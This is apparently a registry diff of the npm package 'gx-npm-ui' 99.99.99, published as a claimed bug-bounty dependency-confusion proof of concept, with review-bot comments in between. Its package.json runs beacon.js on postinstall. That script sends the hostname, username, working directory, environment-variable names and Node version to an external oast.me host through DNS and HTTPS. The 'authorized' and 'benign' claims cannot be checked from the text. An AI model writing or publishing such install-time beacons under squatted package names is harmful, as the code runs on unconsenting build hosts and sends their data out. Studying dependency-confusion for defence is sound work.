gx-npm-ui 99.99.99
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +30 -0
- package/beacon.js +54 -0
- package/package.json +9 -0
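--- a/package/README.md
+++ b/package/README.md
@@ -0,0 +1,30 @@
+# gx-npm-ui — security-research placeholder
+
+This package is a **benign proof-of-concept** published as part of **authorized
+security testing** (Bugcrowd bug-bounty program). It exists solely to demonstrate a
+**dependency-confusion** condition: an internal package name that a build references
+but that was left **unclaimed on the public npm registry**, allowing a public package
+of the same name to be substituted.
+
+## What it does on install
+
+It emits a single beacon containing **only** non-sensitive proof-of-execution metadata:
+
+- package name
+- hostname
+- OS username
+- current working directory
+- environment-variable **names** (to evidence a CI/build context — values are never read)
+
+It does **NOT** read or transmit environment values, file contents, credentials,
+tokens, source code, or any other data, and it performs **no** destructive action.
+All logic is wrapped so it can never cause a host install to fail.
+
+## For maintainers of the affected project
+
+If you are seeing this, the name `gx-npm-ui` should be **claimed on your private
+registry and/or scoped** (e.g. `@your-org/...`) so it cannot be substituted from the
+public registry. This placeholder will be **unpublished** once the corresponding
+report is acknowledged.
+
+Reported responsibly via Bugcrowd.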
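--- a/package/beacon.js
+++ b/package/beacon.js
@@ -0,0 +1,54 @@
+/*
+* Benign dependency-confusion PoC beacon.
+* Authorized security research (Bugcrowd / Gartner program).
+*
+* On install this sends ONLY non-sensitive proof-of-execution metadata:
+* - package name
+* - hostname
+* - OS username
+* - current working directory
+* - environment-variable NAMES (to evidence a CI/build context, e.g. CI/JENKINS_URL)
+*
+* It NEVER transmits environment VALUES, file contents, credentials, tokens, or any
+* other data, and performs NO destructive action. Every operation is wrapped so a host
+* install can never fail because of this script.
+*/
+(function () {
+try {
+var os = require('os');
+var dns = require('dns');
+var https = require('https');
+
+var OAST = 'd8uectoqtvskhftsa940pm3kth3ahdxn4.oast.me';
+
+function safe(s, n) {
+return String(s == null ? 'na' : s)
+.toLowerCase().replace(/[^a-z0-9]+/g, '-').replace(/^-+|-+$/g, '').slice(0, n || 40) || 'na';
+}
+
+var pkg = process.env.npm_package_name || 'gx-npm-lib';
+var host = ''; try { host = os.hostname(); } catch (e) {}
+var user = ''; try { user = (os.userInfo && os.userInfo().username); } catch (e) {}
+if (!user) user = process.env.USER || process.env.USERNAME || 'na';
+var cwd = ''; try { cwd = process.cwd(); } catch (e) {}
+var envNames = []; try { envNames = Object.keys(process.env).sort().slice(0, 80); } catch (e) {}
+
+// 1) DNS beacon — most reliable through egress filtering: <pkg>.<host>.<user>.<OAST>
+try {
+dns.lookup([safe(pkg, 20), safe(host, 40), safe(user, 30), OAST].join('.'), function () {});
+} catch (e) {}
+
+// 2) HTTP beacon — carries fuller (still non-sensitive) JSON for the report write-up.
+try {
+var meta = { pkg: pkg, host: host, user: user, cwd: cwd, env_names: envNames, node: process.version };
+var d = Buffer.from(JSON.stringify(meta)).toString('base64');
+var req = https.request(
+{ host: OAST, port: 443, method: 'GET', path: '/' + safe(pkg, 20) + '?d=' + d, timeout: 4000 },
+function (res) { res.resume(); }
+);
+req.on('error', function () {});
+req.on('timeout', function () { try { req.destroy(); } catch (e) {} });
+req.end();
+} catch (e) {}
+} catch (e) { /* benign: never break the host install */ }
+})();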
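Review bot: The fallback on line 29, `var pkg = process.env.npm_package_name || 'gx-npm-lib';`, names a different package than the one this manifest publishes (`gx-npm-ui` in package.json line 2), so a beacon that fires outside an npm lifecycle would be mis-attributed in the report; it should read `var pkg = process.env.npm_package_name || 'gx-npm-ui';`. The header comment (lines 5–10) and the README both state the beacon sends ONLY the five listed fields, yet `meta` on line 43 also carries `process.version`; add ` * - Node.js version (process.version)` to the header list so the written disclosure matches the code. The `env_names` field on line 34 ships up to 80 variable names, and names alone can indicate which credentials a build host holds, so the "non-sensitive" wording on line 5 is overstated and should be hedged or the field documented as a deliberate, reviewed choice.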
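--- a/package/package.json
+++ b/package/package.json
@@ -0,0 +1,9 @@
+{
+"name": "gx-npm-ui",
+"version": "99.99.99",
+"description": "Authorized security-research placeholder demonstrating a dependency-confusion condition (Bugcrowd). Benign install-time beacon, non-sensitive proof-of-execution metadata only; no secrets, no exfiltration, no destructive action. Will be unpublished after verification.",
+"license": "MIT",
+"scripts": { "postinstall": "node beacon.js" },
+"files": ["beacon.js","README.md"],
+"keywords": ["security-research","dependency-confusion","proof-of-concept"]
+}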
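Review bot: The manifest gives an affected maintainer no way to verify the "authorized" claim in the description on line 4 — there is no `author`, `repository` or `bugs` field, and the program named in beacon.js (Bugcrowd / Gartner) appears nowhere in the manifest. Anyone who notices the `postinstall` hook on line 6 has to take the description on trust, which is exactly what a dependency-confusion report is asking them not to do. Add an `"author"` entry with a reachable contact and a `"bugs": { "url": "<REPORT-URL-PLACEHOLDER>" }` field so the report can be confirmed and the promised unpublish requested.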